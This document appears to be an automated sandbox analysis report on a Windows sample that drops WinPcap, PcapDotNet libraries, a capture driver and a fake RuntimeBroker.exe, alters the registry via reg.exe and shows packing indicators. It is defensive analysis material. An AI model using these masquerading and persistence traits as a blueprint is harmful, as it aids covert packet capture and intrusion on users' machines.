Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpIpV4PayloadDatagram.cs	Suspicious method names: System.Void PcapDotNet.Packets.Icmp.IcmpIpV4PayloadDatagram::.ctor(System.Byte[],System.Int32,System.Int32)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreLayer.cs	Suspicious method names: System.Nullable`1<System.UInt16> PcapDotNet.Packets.Gre.GreLayer::get_KeyPayloadLength()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpIpV4HeaderPlus64BitsPayloadDatagram.cs	Suspicious method names: System.Boolean PcapDotNet.Packets.Icmp.IcmpIpV4HeaderPlus64BitsPayloadDatagram::CalculateIsValid()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpIpV4HeaderPlus64BitsPayloadDatagram.cs	Suspicious method names: System.Void PcapDotNet.Packets.Icmp.IcmpIpV4HeaderPlus64BitsPayloadDatagram::.ctor(System.Byte[],System.Int32,System.Int32)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpTimestampLayer.cs	Suspicious method names: System.Int32 PcapDotNet.Packets.Icmp.IcmpTimestampLayer::get_PayloadLength()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpTimestampLayer.cs	Suspicious method names: System.Boolean PcapDotNet.Packets.Icmp.IcmpTimestampLayer::EqualPayload(PcapDotNet.Packets.Icmp.IcmpLayer)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpTimestampLayer.cs	Suspicious method names: System.Void PcapDotNet.Packets.Icmp.IcmpTimestampLayer::WritePayload(System.Byte[],System.Int32)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpTimestampLayer.cs	Suspicious method names: System.Boolean PcapDotNet.Packets.Icmp.IcmpTimestampLayer::EqualPayload(PcapDotNet.Packets.Icmp.IcmpTimestampLayer)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpRouterAdvertisementDatagram.cs	Suspicious method names: System.Int32 PcapDotNet.Packets.Icmp.IcmpRouterAdvertisementDatagram::GetPayloadLength(System.Int32)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpAddressMaskRequestLayer.cs	Suspicious method names: System.Boolean PcapDotNet.Packets.Icmp.IcmpAddressMaskRequestLayer::EqualPayload(PcapDotNet.Packets.Icmp.IcmpAddressMaskRequestLayer)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpAddressMaskRequestLayer.cs	Suspicious method names: System.Boolean PcapDotNet.Packets.Icmp.IcmpAddressMaskRequestLayer::EqualPayload(PcapDotNet.Packets.Icmp.IcmpLayer)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpAddressMaskRequestLayer.cs	Suspicious method names: System.Int32 PcapDotNet.Packets.Icmp.IcmpAddressMaskRequestLayer::get_PayloadLength()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpAddressMaskRequestLayer.cs	Suspicious method names: System.Void PcapDotNet.Packets.Icmp.IcmpAddressMaskRequestLayer::WritePayload(System.Byte[],System.Int32)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreSourceRouteEntryUnknown.cs	Suspicious method names: System.Int32 PcapDotNet.Packets.Gre.GreSourceRouteEntryUnknown::get_PayloadHashCode()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreSourceRouteEntryUnknown.cs	Suspicious method names: System.Void PcapDotNet.Packets.Gre.GreSourceRouteEntryUnknown::WritePayload(System.Byte[],System.Int32)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreSourceRouteEntryUnknown.cs	Suspicious method names: System.Byte PcapDotNet.Packets.Gre.GreSourceRouteEntryUnknown::get_PayloadOffset()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreSourceRouteEntryUnknown.cs	Suspicious method names: System.Byte PcapDotNet.Packets.Gre.GreSourceRouteEntryUnknown::get_PayloadLength()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Gre/GreSourceRouteEntryUnknown.cs	Suspicious method names: System.Boolean PcapDotNet.Packets.Gre.GreSourceRouteEntryUnknown::EqualsPayloads(PcapDotNet.Packets.Gre.GreSourceRouteEntry)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpLayer.cs	Suspicious method names: System.Int32 PcapDotNet.Packets.Icmp.IcmpLayer::get_PayloadLength()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpLayer.cs	Suspicious method names: System.Boolean PcapDotNet.Packets.Icmp.IcmpLayer::EqualPayload(PcapDotNet.Packets.Icmp.IcmpLayer)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Icmp/IcmpLayer.cs	Suspicious method names: System.Void PcapDotNet.Packets.Icmp.IcmpLayer::WritePayload(System.Byte[],System.Int32)
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Ethernet/EthernetDatagram.cs	Suspicious method names: PcapDotNet.Packets.Datagram PcapDotNet.Packets.Ethernet.EthernetDatagram::get_Payload()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Ethernet/EthernetDatagram.cs	Suspicious method names: PcapDotNet.Packets.Datagram PcapDotNet.Packets.Ethernet.EthernetDatagram::get_PayloadByEtherType()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Ethernet/EthernetDatagram.cs	Suspicious method names: System.Int32 PcapDotNet.Packets.Ethernet.EthernetDatagram::get_PayloadLength()
Source: PcapDotNet.Packets.dll.0.dr, PcapDotNet.Packets/Ethernet/EthernetDatagram.cs	Suspicious method names: PcapDotNet.Packets.Ethernet.EthernetPayloadDatagrams PcapDotNet.Packets.Ethernet.EthernetDatagram::get_PayloadDatagrams()

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe

Code function: 31_2_01004F6B InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetCurrentDirectoryA,GetSystemDirectoryA,QueryDosDeviceA,_strlwr,strstr,strstr,strstr,GetDiskFreeSpaceA,CryptAcquireContextA,sprintf,CryptGenRandom,sprintf,sprintf,CryptReleaseContext,GetSystemTime,SystemTimeToFileTime,DialogBoxParamA,DosDateTimeToFileTime,LocalFileTimeToFileTime,SetFileTime,FindCloseChangeNotification,SendDlgItemMessageA,MoveFileExA,strstr,_stricmp,SendDlgItemMessageA,GetLastError,CreateFileA,SetFilePointer,SetFilePointer,SetEndOfFile,SetFilePointer,

31_2_01004F6B

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll			Jump to behavior
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6956:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6356:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6836:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6912:120:WilError_01
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	Mutant created: \BaseNamedObjects\Global\netfxeventlog.1.0

Source: vcredist_2013_x64.exe

String found in binary or memory: Failed to re-launch bundle process after RunOnce: %ls

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe

File written: C:\Users\user\AppData\Local\Temp\nsk9C37.tmp\ioSpecial.ini

Jump to behavior

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\svchost.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\RuntimeBroker.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	Automated click: Continue
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	Automated click: Install

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe

Window detected: Number of UI elements: 19

Source: ywvz5i8kT9.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: ywvz5i8kT9.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: c:\releases\winpcap_4_1_3\winpcap\install\WinPcap Installer Helper\Release\x86\WinPcapInstall.pdb`3\9 source: WinPcapInstall.dll.30.dr
Source:	Binary string: c:\releases\winpcap_4_1_3\winpcap\packetNtx\Dll\Project\Release No NetMon\x64\Packet.pdb! source: Packet.dll0.30.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb^ source: ywvz5i8kT9.exe, 00000000.00000002.492339500.000000000141A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: sfxcab.pdb source: vcredist_2010_x64.exe, vcredist_2010_x64.exe, 0000001F.00000002.429862569.0000000001002000.00000020.00000001.01000000.00000008.sdmp, vcredist_2010_x64.exe, 0000001F.00000000.315342790.0000000001002000.00000020.00000001.01000000.00000008.sdmp, vcredist_2010_x64.exe.0.dr
Source:	Binary string: E:\delivery\Dev\wix37\build\ship\x86\burn.pdb@- source: vcredist_2013_x64.exe, 00000020.00000000.318122793.00000000012BA000.00000002.00000001.01000000.0000000A.sdmp, vcredist_2013_x64.exe, 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmp, vcredist_2013_x64.exe, 00000023.00000002.353278306.00000000012BA000.00000002.00000001.01000000.0000000A.sdmp, vcredist_2013_x64.exe, 00000023.00000000.320109494.00000000012BA000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: C:\Users\Boaz\TFS\tfs06.codeplex.com\PcapDotNet\PcapDotNet\src\PcapDotNet.Base\obj\Release\PcapDotNet.Base.pdb source: ywvz5i8kT9.exe, 00000000.00000002.493961459.0000000003504000.00000004.00000800.00020000.00000000.sdmp, PcapDotNet.Base.dll.0.dr
Source:	Binary string: patchhooks.pdb source: vc_red.msi.31.dr
Source:	Binary string: D:\.000.Private\000.NET\VvMain\vv0\4.0\VvService_64\VvService\obj\Debug\RuntimeBroker.pdb source: ywvz5i8kT9.exe, 00000000.00000002.493875825.00000000034C3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe.0.dr
Source:	Binary string: C:\Users\Boaz\TFS\tfs06.codeplex.com\PcapDotNet\PcapDotNet\bin\Release\PcapDotNet.Core.pdbh@ source: ywvz5i8kT9.exe, 00000000.00000002.493961459.0000000003504000.00000004.00000800.00020000.00000000.sdmp, PcapDotNet.Core.dll.0.dr
Source:	Binary string: c:\releases\winpcap_4_1_3\winpcap\packetNtx\Dll\Project\Release No NetMon\x86\Packet.pdb source: Packet.dll.30.dr
Source:	Binary string: Setup.pdb source: Setup.exe.31.dr
Source:	Binary string: C:\Users\liamc\Desktop\win6x_registry_tweak\obj\Debug\install_wim_tweak.pdb8 source: ywvz5i8kT9.exe, 00000000.00000002.493794845.00000000034A5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\releases\winpcap_4_1_3\winpcap\packetNtx\Dll\Project\Release No NetMon\x64\Packet.pdb source: Packet.dll0.30.dr
Source:	Binary string: SetupEngine.pdb source: SetupEngine.dll.31.dr
Source:	Binary string: C:\Users\Boaz\TFS\tfs06.codeplex.com\PcapDotNet\PcapDotNet\bin\Release\PcapDotNet.Core.pdb source: ywvz5i8kT9.exe, 00000000.00000002.493961459.0000000003504000.00000004.00000800.00020000.00000000.sdmp, PcapDotNet.Core.dll.0.dr
Source:	Binary string: E:\delivery\Dev\wix37\build\ship\x86\burn.pdb source: vcredist_2013_x64.exe, 00000020.00000000.318122793.00000000012BA000.00000002.00000001.01000000.0000000A.sdmp, vcredist_2013_x64.exe, 00000020.00000002.351970613.00000000012BA000.00000002.00000001.01000000.0000000A.sdmp, vcredist_2013_x64.exe, 00000023.00000002.353278306.00000000012BA000.00000002.00000001.01000000.0000000A.sdmp, vcredist_2013_x64.exe, 00000023.00000000.320109494.00000000012BA000.00000002.00000001.01000000.0000000A.sdmp, vcredist_x64.exe.35.dr, vcredist_2013_x64.exe.0.dr
Source:	Binary string: E:\delivery\Dev\wix37\build\ship\x86\burn.pdb@E source: vcredist_x64.exe.35.dr, vcredist_2013_x64.exe.0.dr
Source:	Binary string: C:\Users\Boaz\TFS\tfs06.codeplex.com\PcapDotNet\PcapDotNet\src\PcapDotNet.Core.Extensions\obj\Release\PcapDotNet.Core.Extensions.pdb source: ywvz5i8kT9.exe, 00000000.00000002.494015900.000000000352F000.00000004.00000800.00020000.00000000.sdmp, PcapDotNet.Core.Extensions.dll.0.dr
Source:	Binary string: c:\releases\winpcap_4_1_3\winpcap\install\WinPcap Installer Helper\Release\x86\WinPcapInstall.pdb source: WinPcapInstall.dll.30.dr
Source:	Binary string: c:\releases\winpcap_4_1_3\winpcap\wpcap\PRJ\Release\x86\wpcap.pdb source: wpcap.dll0.30.dr
Source:	Binary string: C:\Users\Boaz\TFS\tfs06.codeplex.com\PcapDotNet\PcapDotNet\src\PcapDotNet.Packets\obj\Release\PcapDotNet.Packets.pdb source: ywvz5i8kT9.exe, 00000000.00000002.494029925.0000000003535000.00000004.00000800.00020000.00000000.sdmp, PcapDotNet.Packets.dll.0.dr
Source:	Binary string: C:\Users\Boaz\TFS\tfs06.codeplex.com\PcapDotNet\PcapDotNet\src\PcapDotNet.Base\obj\Release\PcapDotNet.Base.pdbhI~I pI_CorDllMainmscoree.dll source: ywvz5i8kT9.exe, 00000000.00000002.493961459.0000000003504000.00000004.00000800.00020000.00000000.sdmp, PcapDotNet.Base.dll.0.dr
Source:	Binary string: D:\.000.Private\000.NET\VvMain\vv0\4.0\VvSvcHost_64\VvSvcHost\obj\Release\VvSvcHost.pdb source: ywvz5i8kT9.exe, 00000000.00000002.493875825.00000000034C3000.00000004.00000800.00020000.00000000.sdmp, RuntimeBroker.exe, RuntimeBroker.exe, 0000002B.00000002.491314449.0000000000F72000.00000002.00000001.01000000.0000000E.sdmp, RuntimeBroker.exe0.0.dr
Source:	Binary string: C:\Users\liamc\Desktop\win6x_registry_tweak\obj\Debug\install_wim_tweak.pdb source: ywvz5i8kT9.exe, 00000000.00000002.493794845.00000000034A5000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: SetupResources.pdb source: SetupResources.dll4.31.dr, SetupResources.dll7.31.dr, SetupResources.dll3.31.dr, SetupResources.dll1.31.dr, SetupResources.dll2.31.dr, SetupResources.dll0.31.dr, SetupResources.dll.31.dr, SetupResources.dll6.31.dr, SetupResources.dll8.31.dr
Source:	Binary string: SetupUi.pdb source: SetupUi.dll.31.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe

Unpacked PE file: 0.2.ywvz5i8kT9.exe.f70000.0.unpack &#K':~`s:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	Code function: 31_2_010065F3 push ecx; ret		31_2_01006603
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Code function: 32_2_012A9B85 push ecx; ret		32_2_012A9B98

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe

Code function: 31_2_010029C2 GetSystemDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

31_2_010029C2

Source: ywvz5i8kT9.exe

Static PE information: 0xF07421E8 [Fri Nov 1 11:11:36 2097 UTC]

Source: ywvz5i8kT9.exe	Static PE information: section name: &#K':~`s
Source: ywvz5i8kT9.exe	Static PE information: section name:
Source: vcredist_2013_x64.exe.0.dr	Static PE information: section name: .wixburn
Source: PcapDotNet.Core.dll.0.dr	Static PE information: section name: .nep
Source: vcredist_x64.exe.32.dr	Static PE information: section name: .wixburn
Source: vcredist_x64.exe.35.dr	Static PE information: section name: .wixburn

Source: Uninstall.exe.30.dr	Static PE information: real checksum: 0xedce7 should be: 0x21e7b
Source: RuntimeBroker.exe0.0.dr	Static PE information: real checksum: 0x0 should be: 0xb98e
Source: RuntimeBroker.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0xe91f
Source: install_wim_tweak.exe.0.dr	Static PE information: real checksum: 0x0 should be: 0x18d1b
Source: ywvz5i8kT9.exe	Static PE information: real checksum: 0x0 should be: 0x1e6dc
Source: ExecDos.dll.30.dr	Static PE information: real checksum: 0x0 should be: 0x5778
Source: UserInfo.dll.30.dr	Static PE information: real checksum: 0x0 should be: 0xb9d1
Source: pthreadVC.dll.30.dr	Static PE information: real checksum: 0x0 should be: 0x1a30d
Source: System.dll.30.dr	Static PE information: real checksum: 0x0 should be: 0xa27d
Source: InstallOptions.dll.30.dr	Static PE information: real checksum: 0x0 should be: 0xdd4b

Source: initial sample

Static PE information: section name: &#K':~`s entropy: 7.99419306696

Persistence and Installation Behavior

Uses cmd line tools excessively to alter registry or file data

Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: reg.exe	Jump to behavior

Sample is not signed and drops a device driver

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe

File created: C:\Windows\system32\drivers\npf.sys

Jump to behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: unknown

Executable created and started: C:\Windows\SysWOW64\RuntimeBroker.exe

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe

File created: C:\ProgramData\Package Cache\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\vcredist_x64.exe

Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: C:\4863269369430a9b27\2052\SetupResources.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	File created: C:\ProgramData\Package Cache\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\vcredist_x64.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Packets.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	File created: C:\Program Files (x86)\WinPcap\WinPcapInstall.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	File created: C:\Program Files (x86)\WinPcap\Uninstall.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: C:\4863269369430a9b27\SetupUi.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	File created: C:\Program Files (x86)\WinPcap\rpcapd.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: C:\4863269369430a9b27\3082\SetupResources.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: C:\4863269369430a9b27\Setup.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Base.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	File created: C:\Windows\System32\wpcap.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: C:\4863269369430a9b27\sqmapi.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	File created: C:\Windows\System32\Packet.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	File created: C:\Windows\SysWOW64\Packet.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\RuntimeBroker.exe	Jump to dropped file
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Core.Extensions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	File created: C:\Users\user\AppData\Local\Temp\nsk9C37.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	File created: C:\Windows\SysWOW64\pthreadVC.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	File created: C:\Windows\SysWOW64\wpcap.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	File created: C:\Users\user\AppData\Local\Temp\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\.be\vcredist_x64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	File created: C:\Windows\System32\drivers\npf.sys	Jump to dropped file
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Analysis.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: C:\4863269369430a9b27\1031\SetupResources.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: C:\4863269369430a9b27\1028\SetupResources.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: C:\4863269369430a9b27\1033\SetupResources.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	File created: C:\Users\user\AppData\Local\Temp\nsk9C37.tmp\ExecDos.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: C:\4863269369430a9b27\SetupEngine.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	File created: C:\Users\user\AppData\Local\Temp\nsk9C37.tmp\UserInfo.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: C:\4863269369430a9b27\1036\SetupResources.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	File created: C:\Windows\SysWOW64\RuntimeBroker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: C:\4863269369430a9b27\1049\SetupResources.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\install_wim_tweak.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: C:\4863269369430a9b27\1040\SetupResources.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: C:\4863269369430a9b27\1041\SetupResources.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: C:\4863269369430a9b27\1042\SetupResources.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	File created: C:\Users\user\AppData\Local\Temp\nsk9C37.tmp\InstallOptions.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2013_x64.exe	File created: C:\Users\user\AppData\Local\Temp\{ea14036a-96ff-4c95-a988-78d36f0ccffa}\.ba1\wixstdba.dll	Jump to dropped file
Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\system32\PcapDotNet.Core.dll	Jump to dropped file

Source: C:\Users\user\Desktop\ywvz5i8kT9.exe	File created: C:\Windows\SysWOW64\RuntimeBroker.exe	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	File created: C:\Windows\System32\wpcap.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	File created: C:\Windows\System32\Packet.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	File created: C:\Windows\SysWOW64\Packet.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	File created: C:\Windows\SysWOW64\pthreadVC.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	File created: C:\Windows\SysWOW64\wpcap.dll	Jump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\WinPcap_4_1_3.exe	File created: C:\Windows\System32\drivers\npf.sys	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: c:\4863269369430a9b27\1033\eula.rtf
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: c:\4863269369430a9b27\1041\eula.rtf
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: c:\4863269369430a9b27\1042\eula.rtf
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: c:\4863269369430a9b27\1028\eula.rtf
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\vcredist_2010_x64.exe	File created: c:\4863269369430a9b27\2052\eula.rtf
